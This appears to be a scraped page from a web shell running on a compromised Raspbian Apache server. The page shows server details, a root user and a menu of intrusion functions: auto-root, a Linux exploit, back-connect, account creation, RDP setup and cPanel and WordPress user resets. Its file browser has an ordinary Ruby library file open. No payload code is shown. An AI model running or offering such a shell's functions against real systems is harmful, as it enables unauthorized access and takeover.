Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
thread_safe /
[ HOME SHELL ]
Name
Size
Permission
Action
util
[ DIR ]
drwxr-xr-x
atomic_reference_cache_backend...
33.9
KB
-rw-r--r--
cache.rb
4.42
KB
-rw-r--r--
mri_cache_backend.rb
1.45
KB
-rw-r--r--
non_concurrent_cache_backend.r...
2.66
KB
-rw-r--r--
synchronized_cache_backend.rb
1.32
KB
-rw-r--r--
synchronized_delegator.rb
1.19
KB
-rw-r--r--
util.rb
700
B
-rw-r--r--
version.rb
492
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : util.rb
module ThreadSafe module Util FIXNUM_BIT_SIZE = (0.size * 8) - 2 MAX_INT = (2 ** FIXNUM_BIT_SIZE) - 1 CPU_COUNT = 16 # is there a way to determine this? autoload :AtomicReference, 'thread_safe/util/atomic_reference' autoload :Adder, 'thread_safe/util/adder' autoload :CheapLockable, 'thread_safe/util/cheap_lockable' autoload :PowerOfTwoTuple, 'thread_safe/util/power_of_two_tuple' autoload :Striped64, 'thread_safe/util/striped64' autoload :Volatile, 'thread_safe/util/volatile' autoload :VolatileTuple, 'thread_safe/util/volatile_tuple' autoload :XorShiftRandom, 'thread_safe/util/xor_shift_random' end end
Close